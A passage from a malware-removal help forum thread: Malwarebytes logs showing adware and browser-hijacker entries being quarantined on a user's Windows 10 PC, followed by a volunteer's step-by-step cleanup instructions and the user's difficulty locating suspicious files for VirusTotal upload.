File System: NTFS
User: Jackie

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 353212
Time Elapsed: 1 hr, 14 min, 33 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 19
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\APPID\{8f639f6b-f8fd-476e-8cca-6f5f4cbbe467}, Quarantined, [77ce2d5a9405d561df79fdcea959c937],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{8F639F6B-F8FD-476E-8CCA-6F5F4CBBE467}, Quarantined, [77ce2d5a9405d561df79fdcea959c937],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{8F639F6B-F8FD-476E-8CCA-6F5F4CBBE467}, Quarantined, [77ce2d5a9405d561df79fdcea959c937],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\APPID\{9c16ad7b-c04f-46a1-bfe6-8cc7b28b1442}, Quarantined, [a2a399eeabee26106ced8d3ea06258a8],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{9C16AD7B-C04F-46A1-BFE6-8CC7B28B1442}, Quarantined, [a2a399eeabee26106ced8d3ea06258a8],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{9C16AD7B-C04F-46A1-BFE6-8CC7B28B1442}, Quarantined, [a2a399eeabee26106ced8d3ea06258a8],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}, Quarantined, [bc8993f447525cda4db61b7c92703cc4],
PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}, Quarantined, [bc8993f447525cda4db61b7c92703cc4],
PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{79b7274a-124a-4eeb-8ce3-f4b50e19a3f7}, Quarantined, [f94c12755148a294ea93b912020023dd],
PUP.Optional.GetNow, HKLM\SOFTWARE\CLASSES\INTERFACE\{237FDFDB-3722-470E-8BA8-90196DABE967}, Quarantined, [04414c3b9cfd6bcb6f07b109a55d9e62],
PUP.Optional.GetNow, HKLM\SOFTWARE\CLASSES\TypeLib\{F126C9FC-9299-40F2-BD42-C59023AD1E7F}, Quarantined, [bd88dbac940539fd1f57ab0f867ce61a],
PUP.Optional.GetNow, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{237FDFDB-3722-470E-8BA8-90196DABE967}, Quarantined, [bd88dbac940539fd1f57ab0f867ce61a],
PUP.Optional.GetNow, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{237FDFDB-3722-470E-8BA8-90196DABE967}, Quarantined, [bd88dbac940539fd1f57ab0f867ce61a],
PUP.Optional.GetNow, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TypeLib\{F126C9FC-9299-40F2-BD42-C59023AD1E7F}, Quarantined, [6bda285f2b6e90a697df5e5c23df916f],
PUP.Optional.GetNow, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TypeLib\{F126C9FC-9299-40F2-BD42-C59023AD1E7F}, Quarantined, [b98cc6c16a2fe551c0b616a4fe0458a8],
PUP.Optional.Yontoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{CC7D093D-4ABE-474B-A201-7825CE0EADA6}, Quarantined, [4df85d2a6336d36374740930f113ee12],
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ECD8BB97-F6CB-11E4-8279-40E2304EF1BE}, Quarantined, [87be582f8910f343d39d3de3c53ea759],
PUP.Optional.InstallCore, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\InstallCore, Quarantined, [57eee0a71980b284320b9579c34137c9],
PUP.Optional.Yontoo, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [48fd41460693f145b1368faaf70d738d],

Registry Values: 6
PUP.Optional.Yontoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DoNotAskAgain, searchinterneat-a.akamaihd.net, Quarantined, [e560394e2e6b3501dfe50c2f48bc0ff1]
PUP.Optional.Yontoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{CC7D093D-4ABE-474B-A201-7825CE0EADA6}|URL, http://searchinterneat-a.akamaihd.n...EURNNfXZNE2oUQEdAKG5RD10eVg==&q={searchTerms}, Quarantined, [4df85d2a6336d36374740930f113ee12]
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ECD8BB97-F6CB-11E4-8279-40E2304EF1BE}|TopResultURLFallback, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Quarantined, [87be582f8910f343d39d3de3c53ea759]
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ECD8BB97-F6CB-11E4-8279-40E2304EF1BE}|URL, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Quarantined, [0540e5a296037eb889e7c35d996ab14f]
PUP.Optional.Yontoo, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DoNotAskAgain, searchinterneat-a.akamaihd.net, Quarantined, [4df8aadd5e3b7fb750b171ca55af37c9]
PUP.Optional.Yontoo, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, http://searchinterneat-a.akamaihd.n...EURNNfXZNE2oUQEdAKG5RD10eVg==&q={searchTerms}, Quarantined, [48fd41460693f145b1368faaf70d738d]

Registry Data: 8
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\CLIENTS\STARTMENUINTERNET\FIREFOX.EXE\SHELL\OPEN\COMMAND, "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.safesear.ch/?type=20151102-120-ff-sm, Good: (firefox.exe), Bad: ("C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.safesear.ch/?type=20151102-120-ff-sm),Replaced,[23223a4dd7c23501e7aa38d9d43148b8]
PUP.Optional.Yontoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://searchinterneat-a.akamaihd.n...FIk0FA1ADB0VXfVBdFElXTwhsNUtrBFgDQl10KVdcDk4=, Good: (www.google.com), Bad: (http://searchinterneat-a.akamaihd.n...0VXfVBdFElXTwhsNUtrBFgDQl10KVdcDk4=),Replaced,[d66f6a1ddcbdfe381ec651c3a1647987]
PUP.Optional.SafeSear.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\CLIENTS\STARTMENUINTERNET\FIREFOX.EXE\SHELL\OPEN\COMMAND, "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.safesear.ch/?type=20151102-120-ff-sm, Good: (firefox.exe), Bad: ("C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.safesear.ch/?type=20151102-120-ff-sm),Replaced,[4ef7a4e307929e981f72d9383ec7669a]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Search Page, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Good: (www.google.com), Bad: (http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}),Replaced,[5aeb384f2b6e57df622d38d914f118e8]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Default_Page_URL, http://www.safesear.ch/?type=20151102-120-ie, Good: (www.google.com), Bad: (http://www.safesear.ch/?type=20151102-120-ie),Replaced,[79cc800738614bebf39c6da43fc6c33d]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Search Bar, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Good: (www.google.com), Bad: (http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}),Replaced,[bc8906818910ab8b9df26da49a6b07f9]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|Default_Search_URL, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Good: (www.google.com), Bad: (http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}),Replaced,[a5a01e697b1e85b1523ece43e0256a96]
PUP.Optional.SafeSear.ShrtCln, HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|SearchAssistant, http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}, Good: (www.google.com), Bad: (http://www.safesear.ch/web/?type=20151102-120-sshome-ie-df&q={searchTerms}),Replaced,[c2830a7d5a3fdc5a37593fd2b84d837d]

Folders: 5
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.DriverRestore, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverRestore, Quarantined, [ea5b3f484059ba7cc4deda36649f8b75],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],

Files: 25
PUP.Optional.Amonetize, C:\Users\Jackie\Downloads\Unconfirmed 818780.crdownload, Quarantined, [b68f6126643578be2f13027d956cde22],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144 (1).exe, Quarantined, [4afbe99eb0e9dc5a35b25ae481804ab6],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144 (2).exe, Quarantined, [7bca8ef91188db5b5691fc42c43d53ad],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144 (3).exe, Quarantined, [0a3b3c4bcfcaa294e106b48aeb16956b],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144 (4).exe, Quarantined, [fb4a285f9702e94d29bed06e7190748c],
PUP.Optional.APNToolBar, C:\Users\Jackie\Downloads\pal_install_r132144.exe, Quarantined, [78cd7d0af0a9a6905196c27cf011847c],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_oursearchwindow-a.akamaihd.net_0.localstorage, Delete-on-Reboot, [60e581067e1b10267555f08b20e45da3],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_oursearchwindow-a.akamaihd.net_0.localstorage-journal, Delete-on-Reboot, [3c097a0ddebb3cfa478388f3f90be21e],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\am.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\ch.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\cl.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\eb.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\es.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\fb.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\ff.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\gm.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\ie.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\nf.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\search.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.SafeSearch.ShrtCln, C:\Users\Jackie\AppData\Local\Fast Browser\Application\yt.ico, Quarantined, [31148bfcfc9dbe78c941d03d27dc639d],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0\manifest.json, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0\background.js, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0\content.js, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pakhbmhdgddbmkdbfbdaeeeajphlpdib\1.0.5909.31489_0\icon.png, Quarantined, [65e01d6a1f7a52e433c42e11996cba46],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences, Good: ("session":{"restore_on_startup":4,"startup_urls":["https://www.malwarebytes.org/restorebrowser/"]}}), Bad: ("session":{"restore_on_startup":4,"restore_on_startup_migrated":true,"startup_urls":["http://searchinterneat-a.akamaihd.n...FIk0FA1oDB0VXfV5bFElXTwhsNUtrBFgDQl10KVdcDk4=","http://google.com/"],"urls_to_restore_on_startup":["http://searchinterneat-a.akamaihd.n...FIk0FA1oDB0VXfV5bFElXTwhsNUtrBFgDQl10KVdcDk4="]}}), Replaced,[5aeb5d2ae2b7cd69516edd64b64f728e]

Physical Sectors: 0
(No malicious items detected)

(end)
 
#13 ·
Here is the second of two MBAM logs:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/13/2016
Scan Time: 3:52 AM
Logfile: malbytes 2.txt
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.03.13.01
Rootkit Database: v2016.03.12.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Jackie

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 353847
Time Elapsed: 25 min, 46 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 3
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_oursearchwindow-a.akamaihd.net_0.localstorage, Quarantined, [61e4aaddbbde84b2903a0675f3116c94],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_oursearchwindow-a.akamaihd.net_0.localstorage-journal, Quarantined, [52f37e099504ae888842bfbc000446ba],
PUP.Optional.Yontoo, C:\Users\Jackie\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences, Good: ("session":{"restore_on_startup":4,"startup_urls":["https://www.malwarebytes.org/restorebrowser/"]}}), Bad: ("session":{"restore_on_startup":4,"restore_on_startup_migrated":true,"startup_urls":["http://searchinterneat-a.akamaihd.n...FIk0FA1oDB0VXfV5bFElXTwhsNUtrBFgDQl10KVdcDk4=","http://google.com/"],"urls_to_restore_on_startup":["http://searchinterneat-a.akamaihd.n...FIk0FA1oDB0VXfV5bFElXTwhsNUtrBFgDQl10KVdcDk4="]}}), Replaced,[a99c1a6d9dfcc96d982782bf719404fc]

Physical Sectors: 0
(No malicious items detected)

(end)
 
#14 ·
In your next reply please include:
  • Did you have any problems with the instructions?
  • FRST.txt
  • Addition.txt
  • AdwCleaner[S1].txt
  • The MBAM logs
  • Are there any changes in computer behavior?
The only problem that I had was copying the MBAM logs to clipboard. So, I copied them to txt. file.
I did feel unsure of myself throughout this process, so I hope I did everything ok for you. If I did not, let me know.

Thank you for all of your help capnkrunch. Btw, luv the dog in your profile pic. I luv dogs.
 
#15 ·
Hello jj832 :)

Thank you very much for taking on my case.
You're welcome. Apologies for the delay and thanks for your patience.

During this scan, towards the beginning of the scan, my McAfee antivirus quarantined a trojan called "Artemis."
Thanks for letting me know. Artemis is a generic McAfee detection. Basically they found something suspicious but it doesn't quite match anything in there database. It's possible this was a false passive of part of FRST.

I did feel unsure of myself throughout this process, so I hope I did everything ok for you.
Don't worry, you did everything perfectly. In the future, don't hesitate to stop and ask if anything is unclear or you're not sure how to do something. I would much rather take all the time necessary to answer all your questions than break something because my instructions were not clear enough.

How about this? I will try to keep future instruction sets shorter; only one or two steps. That should make things a bit more manageable.

I will review your logs and provide the next set of instructions when I'm home from work.

The husky is my baby, Molly. If you think that picture is cute, you should see how stunning she is in person. :D

Regards,
-capnkrunch
 
#17 ·
Hello jj832 :)

Let's start off by making a backup of your registry. This will give us something to restore to in case something goes wrong.

Create a Backup With Tweaking.com Registry Backup (TCRB)
There is also a tutorial with pictures available HERE.
  • Download TCRB from HERE and save it to your Desktop.
  • Double-click on tweaking.com_registry_backup_setup.exe and follow the prompts to install TCRB.
  • Launch TCRB.
  • Click the Backup Registry tab and make sure all the boxes are checked.
  • Click on Backup Now.
  • Once the backup is finished you can now exit the program.

Also, please answer the following questions:

Do you recognize the following Chrome extensions? Were they installed voluntarily?
Chrome Remote Desktop
Printiki


Please post each log separately to prevent it being cut off by the forum post size limiter.
Check each after you've posted it to make sure it's all present, if any log is cut off you'll have to post it in sections...

In your next reply please include:
  • Did you have any problems with the instructions?
  • Were you able to successfully make a registry backup with TCRB?
  • An answer to my question about Chrome extensions
  • Are there any changes in computer behavior?
 
#18 ·
Ok, I did the backup with TCRB .

Also, in answer to your question: I did download Chrome Remote Desktop and Printiki. But, I don't use them and did not bother to figure out how to get rid of them.

Do you want me to post the TCRB backup registry results? I do not think that you do.

I had no problems with the instructions. Making the registry backup with TCRB was easy. My computer is running fine. No changes.

I just started playing Scrabble on Facebook. That game is running extremely slow. That is the only problem.

Thank you, capnkrunch
 
#19 ·
Hello jj832 :)

Also, in answer to your question: I did download Chrome Remote Desktop and Printiki. But, I don't use them and did not bother to figure out how to get rid of them.
That's OK. Once we're finished I can give you instructions for uninstalling Chrome extensions.

Do you want me to post the TCRB backup registry results? I do not think that you do.
You are correct, I only needed to know that you were able to do it successfully.

Step one...

Show Hidden Files and Folders
  • Click Start and then click Control Panel.
  • Click Appearance and Personalization, and then click Folder Options.
  • Click on the View tab.
  • Check Show hidden files, folders, and drives and uncheck Hide extensions for known file types.
  • Click OK.

Step two...

Upload Files to VirusTotal
  • Please go to VirusTotal.
  • Click the Choose File button.
  • Navigate to one of the following files:
    C:\Program Files (x86)\Windriver\Scheduler.Service.exe
    C:\WINDOWS\system32\bitst.exe
    C:\Windows\system32\DRIVERS\13114cc54a946f641c081c84a88f491d.sys
  • Click the Scan it! button.
  • You might see a message saying File already analysed, if you do click Reanalyse.
  • Wait for all the scans to finish then copy and paste the web address from your broswer's address bar.
    Example of web address :
  • Include the link in your next reply.
  • Repeat for each of the listed files.
    Do not worry if you cannot find one or more of the files, just let me know which one(s).

Please post each log separately to prevent it being cut off by the forum post size limiter.
Check each after you've posted it to make sure it's all present, if any log is cut off you'll have to post it in sections...

In your next reply please include:
  • Did you have any problems with the instructions?
  • The VirusTotal links
  • Are there any changes in computer behavior?
 
#20 ·
I am so sorry. I tried, but I could not make this set of instructions work.(n)

I did step 1, no problem. On step 2, I clicked on Virus Total, then clicked on the choose file button. The files aren't listed in my computer like you have them.

When I click on the choose file button, it opens to "This PC>Downloads." So, I went down the list on the left and chose TI10700000B (C:).

I went down the list on that and clicked on Program Files (x86). Next there is a list, all file folders, Adobe, Amazon, AntiRansomware 2.0, Apple Software Update, Atheros, Bluetooth Suite, common files, Game Top.com, Google, Install Shield Installation Information, and so on and so on. At this point, I am just lost as to how to make this work.

So sorry, capn. What should I do next? Thank you.
 
#21 ·
Hello jj832 :)

Under the Program Files (x86) folder do you see a folder named Windriver? If so click on it and look for a file named Scheduler.Service.exe. It's possible that there is no Windriver folder. If that's the case simply move on to the next file.

For the other two files, the folders should at least exist. If you can't find the file inside just move on. Try all three, if you can't find any that's fine, just let me know. If you can't open or find the folders, that's also fine but make sure to tell me.

There's other ways to investigate these files so worst case scenario we just move on and try something else.

Regards,
-capnkrunch
 
#22 ·
Another thought: it may be easier to check if the files exist in File Explorer first.
  • Click Start and then File Explorer.
  • Copy and paste the file path minus the file name into the address bar and press Enter. For example C:\WINDOWS\system32.
  • Click anywhere inside the folder.
  • Type the first few letters of the file name. For example, bit.
  • If you see the file then try to upload it to VirusTotal. If not move on to the next one.
 
#23 ·
I am so sorry Capnkrunch.

I have tried the best that I can all day to find these files, and I am not finding them.

C:\Program Files (x86)\Windriver\Scheduler.Service.exe - I get as far as Program Files (x86)

C:\WINDOWS\system32\bitst.exe - I get as far as system 32

C:\Windows\system32\DRIVERS\13114cc54a946f641c081c84a88f491d.sys - I get as far as drivers.

I used search over and over again. I have tried to make out the shorthand of the files. I have attempted to put them in a document and attach them here. I am sorry that I am just not getting this step.

:cry: Jackie
 
Status
Not open for further replies.
You have insufficient privileges to reply here.
Top